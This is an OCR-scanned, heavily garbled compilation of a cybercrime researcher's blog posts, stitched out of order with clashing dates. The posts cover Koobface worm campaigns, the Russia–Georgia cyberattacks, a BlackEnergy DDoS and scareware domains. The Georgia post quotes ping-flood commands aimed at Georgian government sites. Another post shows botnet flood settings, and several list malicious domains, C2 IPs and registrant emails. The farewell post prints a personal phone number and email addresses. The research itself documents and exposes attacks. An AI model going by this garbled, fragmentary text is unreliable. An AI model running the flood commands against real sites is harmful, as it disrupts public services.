today is a tax payer’s dollar saved somewhere. 


The big news is this is going to be [2]the last post. 


| wanted to say big thanks to everyone who’s been following my work even since | originally 
launched my personal blog back in December, 2005 and to my one and only employer in the 
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world Webroot Inc. for hiring me and bringing me on board which basically resulted in a decent 
lifestyle for a period of several years including the renovation of my place. 


[3] 


DANCHO DANCHEV 


Email: dancho.danchev@gmail.com 

Cell: +359 888 996 888 

Personal Blog: http://ddanchev.blogspot.com 
ZDNet Blog: http://zdnet.com/blog/security 
Webroot Blog: http://blog.webroot.com 
Twitter: http://twitter.com/danchodanchev 


LinkedIn: http://linkedin.com/in/danchodanchev 


DANCHO DANCHEV 


CYBERCRIME RESEARCHER | SECURITY BLOGGER AT CBS. 
INTERACTIVE'S ZDNET | SECURITY BLOGGER AT WEBROOT INC. 


SS FLIP FOR CONTACTS 


What I’m left with after my retirement? A modest $150 social pension to take care of my mobile 
and Internet bills including some food which is a great advice for everyone involved in the field 
to know that it takes a bold man including a one-man show operation to take care of everything 
and then try to retire. 


[4] 
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herdProtect 


My advices for everyone in the industry include the following hots tips right and straight from 
the source: 


- never fell victim into the "certificate crowd" myopia and the "more the merrier" mentality be 
yourself say everything and don’t forget to do everything and never take credit for what you’re 
doing and what you’ve been doing and always say cheers or hi to someone who says hi and 
cheers to your work and achievement 


- don’t forget the U.S is secretly hiring security bloggers to jump in the Information Warfare 
front if there’s any which is naturally something that there is but only in case you know what 
you're up to in terms of getting yourself dazzled and embraced by any of the virtual domain di- 
mensions that you choose for your Information and Cyber Warfare purposes and goal achieving 
projects 


[5] 
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Best wishes to everyone who made it happen. And in a surreal universe remember that 
"diamonds degrade their quality. Bulletproof hosting services courtesy of the RBN are for- 
ever. Grab a copy of memoir from [6]here including from [7]Cryptome.org and consider going 
thought my research portfolio throughout the years here and stay tuned for the Second Edi- 
tion of my Cyber Intelligence memoir which will be published in Bulgarian and made available 
exclusively to Bulgarian readers who might be interested in catching up in terms of what I’ve 
been up to during the years. 


Don’t forget if you ever need me for anything including a project that you want to work with me 
on including advice or just to say "hi" and thanks for all the hard work or anything in general 
feel free to drop me a line at dancho.danchev@hush.com which is my email address account 
which | check 24/7 and I'll make sure to send back a proper response. 


Yours sincerely not necessarily exclusively and don’t forget that although [8]you know my name 
you should not necessary do your best to look up my "number". 


1. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEgUJSI-Q8bZiWtIK1qzM2qwD1NkIHBLYWDrtyFL-OONyxSn1 
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distance past. 


Related posts: 
[1]Embassy of Portugal in India Serving Malware 


[2]Ethiopian Embassy in Washington D.C Serving Malware 
[3]USAID.gov compromised, malware and exploits served 
[4]Azerbaijanian Embassies in Pakistan and Hungary Serving Malware 
[5]Embassy of India in Spain Serving Malware 

[6]Embassy of Brazil in India Compromised 

[7]The Dutch Embassy in Moscow Serving Malware 

[8]U.S Consulate in St. Petersburg Serving Malware 

[9]Syrian Embassy in London Serving Malware 

[10]French Embassy in Libya Serving Malware 


. http: //ddanchev. blogspot .com/2009/03/embassy-of-portugal-in-india-serving. htm 


ttp://ddanchev. blogspot .com/2009/03/ethiopian-embassy- in-washington-dc.htm 


. http: //blogs.zdnet.com/security/?p=281 


. http: //ddanchev. blogspot .com/2009/03/azerbai janian-embassies-in-pakistan-and.htm 


ttp://ddanchev. blogspot .com/2008/11/embassy-of-brazil-in-india- compromised. htm 


. http: //ddanchev. blogspot .com/2008/01/dutch-embassy-in-moscow-serving-malware.htm 
. http: //ddanchev. blogspot .com/2007/09/us- consulate-st-petersburg-serving.htm 
. http: //ddanchev. blogspot .com/2007/09/syrian-embassy-in-london-serving.htm 


1 
2 
3 
4 
5. http: //ddanchev. blogspot .com/2009/01/embassy-of-india-in-spain-serving. htm 
6 
7 
8 
9 


. http: //ddanchev. blogspot. com/2007/12/have-your-malware-in-timely-fashion.htm 


5.7 July 


5.7.1 Summarizing Zero Day’s Posts for June (2009-07-01 22:26) 
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. https: SSSI googleusercontent .com/img/b/R29VZ2x1/AVvXsEiIcLQELQjKqUr_n4Ufuiphf j7-TUu02ypSh45T3KDn9GxTb 
5, hctps; / blogger .googleusercontent..con/ing/o/R29vZ2x1/AV ksBigeTESxsgex_shTJBgATShRaP6S!-pG4_avaiPTLi6J¢z24 


6. https://archive.org/download/cyber-intelligence_20210817/cyber-intelligence_611b8774. pdf 
7. https: //archive.org/download/cyber-intelligence_20210817/cyber-intelligence_611b8774. pdf 


8. https://www. youtube. com/watch?v=noGjJyEDm5s 


> 


18.7.4 Dissecting the Koobface Worm’s December Campaign (2022-07-08 18:37) 


facebook 


© The following website has been identified as malicious: 


http: //Qeocttes. com/madeineeston 10 index.htm ?8 14ch 1780 mes 38270998 26.80 46cn8 450d 4646 3549 


The link you have cicked has been identified by Facebook as 2 malicious web site. for the safety and privacy of your 
Facebook accourit, we strongly suggest you avoid visiting ths address. 


Return to previous page 


The [1]Koobface Facebook worm - [2]go through an [3]assessment of a previous campaign 
- is once again making its rounds across social networking sites, [4]Facebook in particular. 
Therefore, shall we spill a big cup of coffee over the malware campaigners efforts for yet 
another time? But of course. 
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Only OPSEC-ignorant malware campaigners would leave so much traceable points, in between 
centralizing the campaign’s redirection domains on a single IP. For instance, taking advantage 
of free web counter whose publicly obtainable statistics - the account has since been deleted 
- allow us to not only measure the clickability of Koobface’s campaign, but also, prove that 
they’re actively multitasking by combining blackhat SEO and active spreading across several 
other social networking sites. Here are some of the key summary points for this campaign : 


Key summary points : 


- the hosting infrastructure for the bogus YouTube site and the actual binary is provided 
by several thousand dynamically changing malware infected IPs 


- all of the malware infected hosts are serving the bogus YouTube site through port 7777 


- the very same bogus domains acting as central redirection points from the November’s 
Campaign remain active, however, they’ve switched hosting locations 


- if the visitor isn’t coming from where she’s supposed to be coming, in this case the 
predefined list of referrers, a single line of "scan ref" is returned with no malicious content 
displayed 


- the campaign can be easily taken care of at least in the short term, but shutting down 
the centralized redirection points 
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@)0 200 HTTP geocities.com /madelineeaton 1O/index.htm?614chi780=e9382709¢96... 741 text/html 


$3) 1 200 HTTP us.geocities.com /js_source/geovck08.js 1,448 applications... 

|@)2 200 HTTP geocities.com /madelineeaton!O/index.htm?814ch1780=ea3a2709c98... 741 ~— text/html 

[9)3 =. 200—S ss HTTP geocities.com jjs_source/tab04,html 930 text/html 

2) 4 200 + =HTTP geocities.com fjs_source/adframe07.htmi 940 text/html 

i) S 200 HTTP 15.11. ¥iTMg. CON us. yimg.comfifus/smbizjel/geo_teb_right 1 .gif 342 nage/or 

s)< 200 HTTP J5.i1 ying i us. yimg.com/ifus/smbizjeligeo_tab_left1 .gif 943 nage/of 

> ? 200 HTTP us.il.yimg.com fus.ying.comyi/me/me.js 242 application/.. 

$s) 9 200 HTTP us.il.yimg.com jfus.yimg.comyi/mejmei.js 98 application/.. 

[910 = 200s HTTP themis.geocities.yahoo.com —fthemis/h.php?curl=http://us.geocities.com/madelineeat... 1,714 text/html; c... 
compifme/mc2.js 2,140 application/.. 


$)i1 200 HTTP us.il.yimg.com jus.yimg 


c9826a046caasSOd4 D text/html 


text/html 
fus.js.yieng.com/lb/ smb) js/hosting/cp/is_source/geov2_... 37 application/... 
ithemis/ovea 3 302 application’... 


text/html 


ppication/ 
text/html 


What follows are the surprises, namely, despite the fact that Koobface is pitched as a Facebook 
worm, according to their statistics - [5]go through a previously misconfigured malware cam- 
paign stats - the majority of unique visitors from the December’s campaign appear to have 
been coming from Friendster. As for the exact number of visitors hitting their web counter, 
counting as of 7 November 2008, 12:58, with 91,109 unique visitors on on 07 Nov, Fri and 
another 53,260 on 08 Nov, Sat before the counter was deleted, the cached version of their 
web counter provides a relatively good sample. 


On each of the bogus Geocities redirectors, the very same lostart .info/js/gs.js (58.241.255.37) 
used in the previous campaign, attempts to redirect to find-allnot .com/go/fb.php 
(58.241.255.37) or to playtable .info/go/fb.php (58.241.255.37), with fb.php doing the 
referrer checking and redirecting to the botnet hosts magic. Several other well known 
malware command and control locations are also parked at 58.241.255.37 : 


jobusiness .org 
a221008 .com 
y171108 .com 
searchfindand .com 
ofsitesearch .com 
fashionlineshow .com 


anddance .info 
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firstdance .biz 

prixisa .com 
danceanddisc .com 
finditand .com 
findsamthing .com 
freemarksearch .com 
find-allnot .com 
find-here-and-now .com 
findnameby .com 


anddance .info 


These domains, with several exeptions, are actively participating in the campaign, with 
the easiest way to differentiate whether it’s a Facebook or Bebo redirection, remaining the 
descriptive filenames. For instance, fb.php corresponds to Facebook redirections and be.php 
corresponding to Bebo redirections (ofsitesearch .com/go/be.php). However, the meat resides 
within the statistics from their campaign : 
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The following is a brief summary of all of my posts at ZDNet’s [1]Zero Day for June. 


You can also go through previous summaries for [2]May, [3]April, [4]/March, [5]February, 
[6]January, [7]December, [8]November, [9]October, [10]September, [11]August and [12]July, 
as well as subscribe to my [13]personal RSS feed or [14]Zero Day’s main feed. 


Notable articles include: [15]Microsoft study debunks profitability of the underground 
economy; [16]Overall spam volume unaffected by 3FN/Pricewert’s ISP shutdown and [17]lra- 
nian opposition launches organized cyber attack against pro-Ahmadinejad sites. 


01. [18]Email service provider: ’Hack into our CEO’s email, win $10k’ 

02. [19]419 scammers using NYTimes.com ’email this feature’ 

03. [20]Microsoft study debunks profitability of the underground economy 
04. [21]Malware poses as fake YellowsnOw iPhone unlocker 

05. [22]Cybercriminals hijack Twitter trending topics to serve malware 
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06. [23]Overall spam volume unaffected by 3FN/Pricewert’s ISP shutdown 

07. [24]Mac OS X malware posing as fake video codec discovered 

08. [25]Researchers demo wireless keyboard sniffer for Microsoft 27Mhz keyboards 

09. [26]China confirms security flaws in Green Dam, rushes to release a patch 

10. [27]lranian opposition launches organized cyber attack against pro-Ahmadinejad sites 
11. [28]Fake Microsoft patches themed malware campaigns spreading 

12. [29]Remote code execution exploit for Green Dam in the wild 

13. [30]Secunia: Average insecure program per PC rate remains high 

14. [31]Michael Jackson’s death themed malware campaigns spreading 


. http: //blogs.zdnet .com/securit 
. http: //ddanchev. blogspot .com/2009/06/summarizing-zero-days-posts-for-may.htm 


ttp://ddanchev. blogspot .com/2009/05/summarizing-zero-days-posts-for-april.htm 


1 

2 

3. 

4 
5 
6 
7 
8 
9 


ttp://ddanchev. blogspot .com/2009/02/summarizing-zero-days-posts-for- january. html 


. http: //ddanchev. blogspot .com/2009/01/summarizing-zero-days-posts-for .htm 
. http: //ddanchev. blogspot .com/2008/12/summarizing-zero-days-posts-for.html 


ttp://ddanchev. blogspot .com/2008/11/summarizing-zero-days-posts-for-october. html 
10. http: //ddanchev.blogspot.com/2008/10/summarizing-zero-days-posts-for.htm 


. -zero-days-posts-for-august.htm 


http: //ddanchev.blogspot.com/2008/09/summarizing 


. http: //ddanchev.blogspot .com/2008/08/summarizing-zero-days-posts-for-july.htm 


. http: //updates.zdnet .com/tags/danchotdanchev.html?t=0&s=0k0=1%mode=rss 


15, 
16. 
18. 
19, 
20. 
21, 


22. http://blogs.zdnet .com/security/?p=3549 
23. http://blogs.zdnet .com/security/?p=3566 


28, 
29, 
30, 
31, 


25. http://blogs.zdnet .com/security/?p=359 
26. http://blogs.zdnet .com/security/?p=3606 


24. http://blogs.zdnet .com/security/?p=357 
27. http://blogs.zdnet .com/security/?p=361 


5.7.2 A Diverse Portfolio of Fake Security Software - Part Twenty Two 
(2009-07-03 18:34) 
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It’s the Facebook message that came from one of your infected friends pointing you to an 
on purposely created bogus Bloglines blog serving fake YouTube video window, that | have 
in mind. [1]The Koobface gang has been mixing social engineering vectors by taking the 
potential victim on a walk through legitimate services in order to have them infected without 
using any client-side vulnerabilities. 


For instance, this bogus Bloglines account (bloglines .com/blog/Youtubeforbiddenvideo) 
has attracted over 150 unique visitors already, part of Koobface’s Hi5 spreading campaign 
(catshof .com/go/hi5.php). The domain is parked at the very same IP that the rest of the 
central redirection ones in all of Koobface’s campaigns are - [2]58.241.255.37. 
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Interestingly, since [3]underground multitasking is becoming a rather common practice, the 
bogus blog has also been advertised within a blackhat SEO farm using the following blogs, 
currently linking to several hundred bogus Google Groups accounts : 


bloglines .com/blog/gillehuxeda 
bloglines .com/blog/chaneyok 
bloglines .com/blog/ramosimeco 
bloglines .com/blog/antwanuvfa 
bloglines .com/blog/tamaraaqo 
bloglines .com/blog/josephyhti 


bloglines .com/blog/whiteqivaju 
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bloglines .com/blog/hayleyem 
bloglines .com/blog/tateigyamor 
bloglines .com/blog/burnsseuhaqge 


bloglines .com/blog/jennaup 


cekeexae 


bijbum kik 


oupon- 
to 


aaa 
ou 


bloglines .com/blog/jermainedus 
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bloglines 
bloglines 
bloglines 


bloglines 


bloglines. 


bloglines 
bloglines 
bloglines 
bloglines 
bloglines 
bloglines 
bloglines 
bloglines 
bloglines 
bloglines 
bloglines 


bloglines 


bloglines. 


bloglines 
bloglines 
bloglines 
bloglines 
bloglines 
bloglines 


bloglines 
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.com/blog/floydwopew55 
.com/blog/arielehy 
.com/blog/onealqypsu 
.com/blog/mackirma 
com/blog/breonnazox 
.com/blog/sabrinaxycit 
:com/blog/gloverqy 
.com/blog/lisaurja 
.com/blog/greenefayg18 
.com/blog/craigxiw36 
.com/blog/parsonsdos 
.com/blog/martinsutuz 
.com/blog/deandreefe 
.com/blog/briannetu 
.com/blog/kierailpe 
.com/blog/fordyfo27 
.com/blog/litzyracnuj 
com/blog/darwinupi57 
.com/blog/bonillavaok 
.com/blog/jennyuxe85 
.com/blog/wilkersonin 
.com/blog/nicolasqydby 
.com/blog/darbyeve 
.com/blog/izaiahro83 


.com/blog/parsonsdos 


bloglines .com/blog/fullerjeb81 


Abusing legitimate services may indeed get more attention in the upcoming year, follow- 
ing their interest in the practice from the last quarter. 


1. http: //ddanchev. blogspot .com/2008/12/dissecting-koobface-worms-december .htm 
2. http://whois.domaintools.com/58.241.255.3 
3. http://ddanchev. blogspot. com/2008/06/underground-multitasking-in-action.htm 


18.7.8 Real-Time OSINT vs Historical OSINT in Russia/Georgia Cyberattacks 
(2022-07-08 18:39) 
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The original [1]real-time OSINT analysis of the Russian cyberattacks against Georgia conducted 
on the 11th of August, not only closed the Russia vs Georgia cyberwar case for me personally, 
but also, once again proved that real-time OSINT is invaluable compared to [2]historical OSINT 
using a commercial social network visualization/data mining tool which cannot and will never 
be able to access the Dark Web, accessible only through real-time [3]CYBERINT practices. 
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The value of real-time OSINT in such [4]people’s information warfare cyberattacks - with 
[5]Chinese hacktivists perfectly aware of the [6]meaning of the phrase - relies on the rel- 
atively lower operational security (OPSEC) the initiators of a particular campaign apply at 
the beginning, so that it would scale faster and attract more participants. What the Russian 
government was doing is fueling the (cyber) fire - literally, since all it takes for a collectivist 
socienty’s cyber militia to organize, is a "call for action" which was taking place at the majority 
of forums, with the posters of these messages apparently using a spamming application to 
achieve better efficiency. 


[7]The results from 56 days of [8]Project Grey Goose in action got published last week, 
a project [9]I discussed back in August, point out to the bottom of the food chain in the entire 
campaign - stopgeorgia.ru : 


OduumanbHpl4 BeGcavT Npe3svugeHta [py3unu ping -n 5000 -| 1000 www.president.gov.ge -t 
NpasutenbcrsBo Fpy3un ping -n 5000 -| 1000 www.government.gov.ge -t 

Napnamenut Fpy3uu ping -n 5000 -| 1000 www.parliament.ge -t 

MMA Ppy2uu ping -n 5000 -| 1000 www.mfa.gov.ge -t 

MBA [py3uuv ping -n 5000 -| 1000 www.police.ge -+t 

MO [py2uu ping -n 5000 -| 1000 www.mod.gov.ge -t 

Muxuctepctso duxaHcos Fpy3un ping -n 5000 -| 1000 www.mof.ge -t 

HauMoHanbHbli BaHk [py3uu ping -n 5000 -| 1000 www.nbg.v.gego -t 


"Furthermore, coming up with [10]Social Network analysis of the cyberattacks would produce 
nothing more but a few fancy graphs of over enthusiastic Russian netizen’s distributing the 
static list of the targets. The real conversations, as always, are [11]happening in the "Dark 
Web" limiting the possibilities for open source intelligence using a data mining software. 
Things changed, OPSEC is slowly emerging as a concept among malicious parties, whenever 
some of the "calls for action" in the DDoS attacks were posted at mainstream forums, they 
were immediately removed so that they don’t show up in such academic initiatives" 


So what’s the bottom line? Nothing that | haven’t already pointed out back in August : 
"[12]Report: Russian Hacker Forums Fueled Georgia Cyber Attacks" : 
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"But experts say evidence suggests that Russian officials did little to discourage the on- 
line assault, which was coordinated through a Russian online forum that appeared to have 
been prepped with target lists and details about Georgian Web site vulnerabilities well before 
the two countries engaged in a brief but deadly ground, sea and air war." 


[13]Some more comments : 


"Just because there was no smoking gun doesn’t mean there’s no connection," said Jeff 
Carr, the principal investigator of Project Grey Goose, a group of around 15 computer security, 
technology and intelligence experts that investigated the August attacks against Georgia. "I 
can’t imagine that this came together sporadically," he said. "| don’t think that a disorganized 
group can coalesce in 24 hours with its own processes in place. That just doesn’t make sense." 


It wouldn’t make sense if this was the first time Russian hacktivists are maintaining the same 
rhythm as real-life events - [14]which of course isn’t. 
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Moreover, exactly what would have constituted a "smoking gun" proving that the Rus- 
sian government was involved in the campaign, remains unknown - I’m still sticking to my 
comment regarding [15]the web site defacement creative. If they truly wanted to compromise 
themselves, they would have cut Georgia off the Internet, at least from the perspective offered 
by this graph courtesy of the [16]Packet Clearing House speaking for their dependability on 
Russian ISPs. 


As for [17]the script kiddies at stopgeorgia.ru, [18]they were informed enough to fea- 
ture my research into their "negative public comments section". To sum up - the "DoS battle 
stations operational in the name of the "/19]Please, input your cause" mentality is always 
going to be there. 


ftp: / blogs ‘zdnet. con/security/?p-1670 
_ http://www. scritd,con/doc/6967353/Project-Grey-Coose-Phase- I-Report 

| http://adanchey blogspot. con/2006/09/cyber~intel Lagence-cyberin nt 
_http://adanchev blogspot .con/2007/10/peoples~ infornation-varfare~concept.Htal 
_ http: //adanchey blogspot .con/2008/04/chinese-hacktivists-vaging-peoples. nt 
_ http: //adanchey blogspot .con/2008/04/ddos-attack-ageinst~cuncon, nt 
_http://invelfusion. net /wordpress/7p-490 

| http: //Antel fusion net/wordpress/7p-208 

_ http: //adanchev blogspot. con/2008/00/unnariaing- auguste-threatecape, ht 
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15. http://georgiaupdate. gov. ge/doc/10006744/CYBERWAR-%20fd_2_new.pdf 
16. http://www. pch.net/ 


ttp://74.125.39.104/search?hl=enkq=cache/3Astopgeorgia.ruj2F/,3Fpg/3Dser&kaq=f koq 


19. http://www.alexandrasamuel .com/dissertation/pdfs/Samuel-Hacktivism-entire. pdf 


18.7.9 The DDoS Attack Against Bobbear.co.uk (2022-07-08 18:39) 
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Black Energy botnet status at 01:27:33 18.11.2008; 


| || 
iemp_freq © 10 ixmp_freq * 10 somp_freq * 10 icmp freq 10 
pomp see = 2000 jpemp_sire = 2000 acmmp_size = 2000 emp size = 2000 
syn_freq * 10 iisyn_freq © 10 syn_freq * 10 lisyn_freq = 10 
spool ip= 1 spoot_ip= 0 spool ip= 0 Iipoot ip 
attack_mode « 0 attack_mode « 0 attack_mode « 0 attack mode « 0 
max sessions = 30 ‘max sesnons = 50 imax_sessicas = 30 fmax_ sessions = 30 
inp freq * 100 bttp_freq = $0 hitp_freq © 50 \bttp_freq = $0 
pnp thrends = 3 [http threads = 4 Dp threads = 4 [http threads = 4 
itcpudp_freq 20 tepodp_freq * 20 acpedp_freq * 20 lncpodp_freq © 20 
judp_size = 1000 udp sire = 1000 mudp_«aze = 1000 udp sire = 1000 
Rcp_size * 2000 jacp_sine * 2000 Acp_size * 2000 mep_sire * 2000 
cmd = flood bunp jicead = food hitp bobbear co.uk emd = flood hemp bobbear co uk cand = flood http bobbear co.uk 
nireqe $ indreq @ $ néreq* $ \ndreq = § 
[botid = (not set) botid = (not set) Pbotd = (not set) [odd = (nce set) 
pomp freq = 10 pemp_freq = 10 acmmp_freq = 10 pemp freq = 10 acmmp_freq = 10 
acmp_sze * 2000 mp _size * Pines] xinp_sze © 2000 bemp_sine * 2000 kimp_size * 2000 
syn_freq = 10 isyn_feq = 10 syn_freq = 10 lsyn_feeg = 30 sya_freq = 10 
spoof_ip* 0 spook ip SomeCustomlnjectedFieaderinjected_by_wvs) spoof_ip* 0 poot_ip= 1 spoof_ip* 0 
wtack mode = 0) attack mode = 0 wtack mode = 0 attack mode = 0 wtack mode = () 
fmax_sessicas 30 man_sessions 30 max_vessions © 30 mmax_sessions = 30 max_tessions © 30 
p_freq = $0 Batp freq = 100 bap eq = 10 Ratp_ freq = 20 ep eq = 100 
_threads © 4 iittp_threads «3 hitp_threads ~ 2000 hittp_theeads « $ Ietp_threads « 3 
tepudp freq = 20 Repudp freq = 20 acpudp freq = 20 ncpodp_feq = 60 tcpudp freq = 20 
lodp_size * 1000 jadp_sire * 1000 bodp_size * 1000 hadp_size « 1000 odp_size * 1000 
tep_sze = 2000 Rep_sire = 2000 ncp size = 2000 Rcp_sire = 2000 tcp_size = 2000 
cmd * flood itp bobbear co.uk hand © wat cmd * stop land * stop cmd © stop 
huteq = 5 halieq = $ utieg = 3 batreq = 14 nitreq = 10 
[botid © (not set) hotid xMYHOST1_347EBCFB botid « (not set) bot © (noe set) botid © (not set) 
iemp_freq * 40 
pomp _size = 2000 
syn_freq * 2000 
spoot_p= 0 
attack _mode « 0 
hmax_sessioas = 30 
ven freq © 20 
np threads = 1400 
tepedp_freq = 4000 
judp_size = 4100 
jtcp_size * 4000 
cmd = flood bem 
néreq* 1 


fbotid = xMYHOST1 347EBCFB} 


When you get the "privilege" of [1]getting DDoS-ed by a high profile DDoS for hire service 
used primarily by cybercriminals attacking other cybercriminals, you’re officially doing hell of 
a good job exposing [2]money laundering scams. 


The attached screenshot demonstrates how even the relatively more sophisticated counter 
surveillance approaches taken by a high profile DDoS for hire service can be, and were in 
fact bypassed, ending up in a real-time peek at how they’ve dedicated 4 out of their 10 
BlackEnergy botnets to Bobbear exclusively. 


Perhaps for the first time ever, | come across a related DoS service offered by the very 
same vendor - insider sabotage on demand given they have their own people in a particular 
company/ISP in question. Makes you think twice before considering a minor network glitch 
what could easily turn into a coordinated insider attack requested by a third-party. Moreover, 
now that I’ve also established the connection between this DDoS for hire service and one of 
the command and control locations (all active and online) of one of the botnets used in the 
[3]Russia vs Georgia cyberattack, the [4]concept of engineering cyber warfare tensions once 
again proves to be [5]a fully realistic one. 
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DDanchev 
Rained 
On My 


Scareware 
Campaign 


Part twenty two of the diverse portfolio of fake security software series will summarize the 
typosquatted scareware serving domains currently in circulation, pushed through the usual 
distribution channels, but will also emphasize on the "money trail", namely the payment 
processing gateways used in the scareware campaigns. 


In this particular case the scareware front-ends ultimately leading to ChronoPay, which 


[1]Germany-based Pandora Software has been abusing since 2008 under its countless number 
of aliases such as Meyrocorp for instance. 
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Related posts: 

[6]A U.S military botnet in the works 

[7]DDoS Attack Graphs from Russia vs Georgia’s Cyberattacks 
[8]Botnet on Demand Service 

[9JOSINT Through Botnets 

[10]Corporate Espionage Through Botnets 

[11]The DDoS Attack Against CNN.com 

[12]A New DDoS Malware Kit in the Wild 


[13]Electronic Jinad v3.0 - What Cyber Jihad Isn’t 


ttp://blogs.zdnet.com/security/?p=2188 
ttp://www.bobbear.co.uk/ 


_ http: //bloge zdnet .con/security/?p-167 

_http://adanchev blogspot .con/2008/02/nalvare- infected-hoste-as-stepping. html 
_ http: //adanchey blogspot. con/2008/08/shos-behind- georgia cyber-at tacks. html 
_ http: //blogs zdnet .con/security/?p-1028 

_http://adanchev blogspot .con/2008/10/ddos-attack- graphe- from russia-ve_ hal 
| http://adanchey blogspot. con/2007/10/botnet-on-denand-service. html 


OMAN AU KBPWN FE 


ttp://ddanchev.blogspot.com/2007/04/osint-through-botnets. htm 
10. http://ddanchev. blogspot .com/2007/05/corporate-espionage-through-botnets.htm 
11. http://ddanchev. blogspot .com/2008/04/ddos-attack-against-cnncom. htm 


ttp://ddanchev. blogspot .com/2007/09/new-ddos-malware-kit-in-wild.htm 


ttp://ddanchev. blogspot .com/2007/11/electronic- jihad-v30-what-cyber- jihad. htm 


18.7.10 Call for Interest - Establishing the Foundations for a Part-Time Project-Based 
Cybercrime Project Task Force (2022-07-08 18:41) 


Dear blog readers, 


| wanted to let everyone know that I’m currently busy a temporary part-time project- 
based task force and | might need your input in terms of a possible Task Force participation in 
the following categories: 


¢ Social Network Analysis 
23783 


¢ Technical Collection 

¢ OSINT Enrichment 

¢ Sentiment Analysis 

¢ Statistical Output Based Demographics Research 


¢ OSINT Visualization 


The project is vetted and invite-only therefore it would be great if you approach me with a 
brief message at dancho.danchev@hush.com signifying your will and capability to participate 
in the project with a brief introduction of your background and how you think you might be 
capable of helping. 


Looking forward to begin working with you. 


Stay tuned! 


18.7.11 Dancho Danchev’s Blog - Soliciting Contributing Writers and Guest Bloggers 
(2022-07-08 18:41) 


Dear blog readers, 


As many of you noticed I’ve recently expanded my blog to include and feature a diverse 
set of personal research portfolio including additional coverage in a variety of areas and | 
wanted to let everyone know that I’m currently busy working on an additional set of research 
articles and new products that I’ll publish anytime soon. 


| wanted to let everyone know that I’m currently busy soliciting an Open Call for Con- 
tributing Writers and Guest Bloggers on one of the industry’s leading Security publications 
- Dancho Danchev’s Blog - Mind Streams of Information Security Knowledge on my way to 
harness the best security and cybercrime researchers including threat intelligence analysts 
from across the Security Industry who might be interested in a diverse and high-profile set of 
audience in terms of publishing their opinion thought and general and never-published before 
security and cybercrime including threat intelligence research. 


Who can participate? - Basically everything who can write security articles and security 
blog posts on various topics including malicious software botnets OSINT methodologies and 


23784 


general cybercrime research including Threat Intelligence analysis. 


Looking forward to receiving your response - disruptive.individuals@gmail.com 


Stay tuned and | look forward to continue working with you! 


18.7.12 Upcoming Personal Memoir - Official Announcement! (2022-07-08 18:43) 


[1] 


Dear blog readers, 


Big news. I’ve recently decided to convert my personal blog into a pre-order landing page for 
my 756 pages long upcoming personal memoir in the world of hacking and security circa the 
90’s up to present day including an elaboration on my security blogging cybercrime research 
and threat intelligence gathering including OSINT and independent contractor analysis exper- 
tise and experience for the purpose of lauching my personal memoir and making it publicly 
accessible in December, 2021 both in print and in multiple E-book formats for the general pub- 
lic or basically anyone who drops me a line at dancho.danchev@hush.com in terms of possible 
pre-order where the print version is priced at $35 and the E-book version is priced at $20. 


What you can do in order to obtain access to my upcoming memoir? Drop me a line at dan- 
cho.danchev@hush.com in terms of possible pre-order including to participate in my pre-order 
newsletter where | will send you a direct message once the memoir is ready to be released 
with the official release date scheduled for December, 2021. 


Some sample content includes: 
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What ts Antivirus Agent Pro? Viru Vatcl 
¥ S Watch 
You are tired of searching for the best and most sanure antivirus on the ret? 


Your ssarches have ended up Antivirus Agent Pro és the most up tb date 

and high quality security soffemre you Gan trust in today’s plentiful workd of © Latest Virus Alerts 
supply and demand. What we offer you aliows forgefiing entirely about all 
tings of 


Virus Win32 Gooode ok 
Ernail- Worm. Win32 Warrmoy nif 
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Stow internet 
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Trojan-PSW.Win32 On LineGa mes. sx 
Trojan-PSW Win32 On| seGames tf 
Trojan-Downloeder_WinJ2_Agent.nmi 
Trojan - Doweraader. Win32 Gretdupsdete c 


In this progressive workd promising the fastest performance in simost al! spheres, especnily in the em of Informetonel 
Technologies 5 men deserves be provided wth the quick and test customer servees and most up to det and high - 
Quality products. Quality smnds a3 premium factor for the consumer who strives to find the procuxts best meeting ther ~=Testimonials 
Gemands. How successful the chowe is depends on many factors 
© “The Antivieus Agent Pro toot has made a 


semerkette difference in both speed and 


1h general the Nigher the costs are more is Te possibility find a really hugh quality and professional preducts. 
susteinatatity of my computer system. Thenks!* 


What can you expect from Antivirus Agent Pro? Alex, Boston, USA 
For the paopte who uses PC Spyware represents 6 globe! problern axtegory, fis 1 security issue whech bef you thevk of being 
provided weth spam scripts flooding your AC wth ad popups. © “ldid « rel xan © understand he imped viruses 
hed on my pe [wes very amend fo find out thet 
Antivirus Agent Pro will help you protect your PC from importunate emails which may tmke int possession your personal testes 8 Viruses the softeere also found spywerms, 
informagon such as passwords, login details and credit ard information. odeates and trojans and keyloggers ~ 
PC users should be firs of af gure that the virtual spmce they use and they are in most part of he Gay is axcurely promi Arnold, Hastings, UK 


Teas and VerLeRes Many Crush your system and mate your “User life a real reghenare 
© “Ih bess than fre minutes my computer was cen 
No more viruses, spyresres, acweres, trojans, 
eyiaggers. | can onty recommend Antivirus Agent 


The scareware domains are as follows: 
atomscan6 .info - 38.105.19.27 - Email: donboset@gmail.com 
listscan6 .com - Email: loiskiltz@gmail.com 
goscanedge .com - Email: subtenda@gmail.com 
goscanfine. com - Email: chirelgas@gmail.com 
in6ch .com - Email: relgetn@gmail.com 
goscanrich .com - Email: pathstals@gmail.com 
goscanrank .com - Email: alcnafuch@gmail.com 
ina6sk .com - Email: equatelepi@gmail.com 
in6sk .com - Email: thomas.truby@gmail.com 
goscanslim .com - Email: chinrfi@gmail.com 
gowidescan .com - Email: alcnafuch@gmail.com 
goedgescan .com - Email: subtenda@gmail.com 
gofinescan .com - Email: alcnafuch@gmail.com 
goelitescan .com - Email: funully@gmail.com 
gorichscan .com - Email: pathstals@gmail.com 
goslimscan .com - Email: chinrfi@gmail.com 
gosoonscan .com - Email: aloxier@gmail.com 
goironscan .com - Email: aloxier@gmail.com 
goflexscan .com - Email: alcnafuch@gmail.com 
gomanyscan .com - Email: alcnafuch@gmail.com 
goscaniron .com - Email: aloxier@gmail.com 
ina6co .com - Email: equatelepi@gmail.com 


2382 


[35] 


[36] 
23799 


| 


bis 


Reet. FES 


[38] 


Are you human? Validation required to access hackbase.cc 


[39] 


lamecheap 
hackboard.org MAF vamecrese 


23800 


Contact Lens 


Hacked pro 


music videos 


Dental Plans 


All Inclusive Vacation Packages 


LIL 


Work from Home 


Hackers 
course 

Ruste heres 
Whhest Cece 


Monsters 
Thenat 
wilethweace 


[42] 
23801 


23802 


& 


O~— Oem Cine —4 OO 


[45] 


in6co .com - Email: thomas.truby@gmail.com 
goscantop .com - Email: funully@gmail.com 
ina6iq .com - Email: equatelepi@gmail.com 
